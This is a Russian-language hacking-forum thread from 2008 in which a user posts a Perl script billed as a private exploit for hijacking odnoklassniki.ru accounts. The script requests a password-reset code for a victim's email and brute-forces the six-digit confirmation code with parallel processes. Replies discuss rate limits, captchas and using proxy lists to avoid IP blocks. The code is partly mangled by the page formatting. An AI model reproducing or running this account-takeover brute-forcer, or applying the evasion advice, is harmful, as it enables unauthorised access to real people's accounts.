Эксплоит для одноклассники.ру

Тема в разделе ".:: Уязвимости", создана пользователем absolutNICK, 30 май 2008.

Статус темы:
Закрыта.
  1. absolutNICK

    absolutNICK Постоялец

    Регистр.:
    31 авг 2007
    Сообщения:
    142
    Симпатии:
    21
    Эксплоит для одноклассники.ру от Rst/ghc

    Вот вам приватный эксплоит для взлома аккаунтов популярной социальной сети odnoklassniki.ru
    Ниже — код эксплоита, приведён исключительно для ознакомления.

    PHP:
    #!/usr/bin/perl
    use LWP::UserAgent;

    print 
    qq(
    ,
    __ __,
    / /
    __ _ / /
    .
    ___/:::* / /
    |
    _____ |/
    /<>
    //,./ / _________
    / / / | RST
    / /.,<>/ | GHC
    /’ \\ / | UKT
    \\ \\ / \\ |__\\xD____
    \\ \\/ /
    ””’ /
    / / /
    / / 
    ___ /
    *
    __ __*
    [
    preved odnoklassne4gi]

    );

    if (!
    scalar(@ARGV)) {
    print 
    \[~\]Usage : ./$0 eMail {number of child procs}\n\n”;
    exit();
    }
    if (-
    e “success”) {
    print 
    \[-\] File \”success\” exists in your directoryPlease rename it or remove.\n\n”;
    exit();
    }

    my $email=”$ARGV[0];

    if (
    $ARGV[1]) {
    my $MAX_PROCESSES=$ARGV[1];
    } else {
    my $MAX_PROCESSES=5;
    }
    my $DEBUG=0;

    my @pids;
    my $npids=0;
    my $restore=0;
    my $e;

    # first step - omg! I lost my password?!?!?!
    $ua=LWP::UserAgent->new();
    $page=$ua->post(”http://odnoklassniki.ru/cdk/st.cmd/password/tkn/6544″,["st.email"=>$email,"st.posted"=>"set"]);
    $page_content=$page->content();
    if (
    $page_content=~/st.email/) {
    print 
    \[-\] Please provide correct email address\n”;
    exit();
    } else {
    print 
    \[+\] Repair password code send to $email\n”;
    }

    # step number two - bruteforce code for repair password
    print \[~\] Brutforce code for repair password\
    This process make take max 18 hours to check all combinations\
    You need good internet channel and fast cpu\n”;
    open(LOG_FILE,>>log”);
    $not=1;
    for (
    $code=100000;$code< =999999;$code++) {
    if (-
    "success") {
    print 
    "DONE";
    exit();
    }
    if (
    $code==199999 && $not==1) {
    $cod="099999";
    $not=0;
    $code=100000;
    elsif ($code=~/^1(d+)$/ && $not==1) {
    $code=~/^1(d+)$/;
    $cod="0$1";
    } else {
    $cod=$code;
    }
    if (
    $cod=~/^(d+)000$/) {
    print 
    "#";
    }

    my $pid;
    $pid=fork();
    if(
    $pid>0){
    push(@pids,$pid);
    $npids++;
    if(
    $npids>=$MAX_PROCESSES){
    for(
    1..($MAX_PROCESSES)){
    $wait_ret=wait();
    if(
    $wait_ret>0){
    $npids–;
    }
    }
    }
    next;
    }
    elsif(undef $pid){
    print 
    “fork error\n” if ($DEBUG);
    exit(
    0);
    }
    $p=$ua->post(”http://www.odnoklassniki.ru/dk”,["st.cmd"=>"passwordReset","st.email"=>$email,"st.confirmation-code"=>$cod,"st.posted"=>"set"]);
    $con=$p->content();
    if (
    $con=~/password.confirmation/) {
    print 
    “$cod cached\n”;
    print 
    LOG_FILE “$cod cached\n”;
    open(SUCCESS,>>success”);
    print 
    SUCCESS “\n############################\n”;
    print SUCCESS “YahoooCongratulationsCode for password repair is $cod\n”;
    print 
    SUCCESS “Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n”;
    print SUCCESS “Type your email ($email), your repair code ($cod) and set new password for your account.\n”;
    print 
    SUCCESS “############################\n”;
    print ############################\n”;
    print “YahoooCongratulationsCode for password repair is $cod\n”;
    print 
    “Go to http://www.odnoklassniki.ru//dk?st.cmd=passwordReset\n”;
    print “Type your email ($email), your repair code ($cod) and set new password for your account.\n”;
    print 
    ############################\n”;
    close(SUCCESS);
    } else {
    print 
    LOG_FILE “$cod failed\n”;
    }
    exit();
    }
    или здесь
     
  2. Dark Wizard

    Dark Wizard

    Регистр.:
    23 сен 2007
    Сообщения:
    153
    Симпатии:
    76
    По-моему он просто пароль перебирает. "18 часов на быстром интернете". . . брутфорс это называется)
     
  3. Lonely Wolf

    Lonely Wolf Прохожие

    Мда обычный брутер тока основы всех брутеров это загрузка списка соксов/прокси а то дырку прикроют после 1-2 бурта поставят туда капчу.
     
  4. absolutNICK

    absolutNICK Постоялец

    Регистр.:
    31 авг 2007
    Сообщения:
    142
    Симпатии:
    21
    Не думаю что одноклассники будут всё уж сильно усложнять в плане каптчи и др., массовость подразумевает легкодоступность и удобство и лёгкость в использовании. Поэтому кое чем однокласники будут жертвовать.
     
  5. General Fizz

    General Fizz Боевой Генерал :)

    Регистр.:
    11 апр 2007
    Сообщения:
    753
    Симпатии:
    396
    Возможно что у них, как и на всех форумах, при вводе более 3-5 раз неправильного пароля акк суспендится и/или ИП уходит в блок лист.
     
  6. Gansales

    Gansales Прохожие



    Замечу,что сплойт уже давно не приватный и на многих хак форумах лежит в паблике.Причем в нескольких вариантах.
     
  7. absolutNICK

    absolutNICK Постоялец

    Регистр.:
    31 авг 2007
    Сообщения:
    142
    Симпатии:
    21
    Уже лежит, но раздачу начали в понедельник. Всё таки быстро на паблик всё распостраняется.:D
     
  8. a1exsh

    a1exsh Постоялец

    Регистр.:
    17 дек 2006
    Сообщения:
    97
    Симпатии:
    74
    Раз уж на многих форумах раздаётся, и распространяется, может планочку снизить и для пользователей Nulled.?
    // By Jeurey: ну неделю ты точно не сможешь ничего увидеть - хайды не обсуждаются. См правила, прировнял к просьбе хайда. ББ ;)
     
  9. Toxic_Cat

    Toxic_Cat Постоялец

    Регистр.:
    19 авг 2007
    Сообщения:
    128
    Симпатии:
    6
    Как начнешь подбор блок по IP сразу сделают. ;)
     
  10. admLoki

    admLoki генератор случайного PHP

    Регистр.:
    14 сен 2006
    Сообщения:
    481
    Симпатии:
    93
    Больше всего я рад, что RST вернулась в бой :) .
    И эксплоит неплохой, сразу заметно кто писал :) .
     
Статус темы:
Закрыта.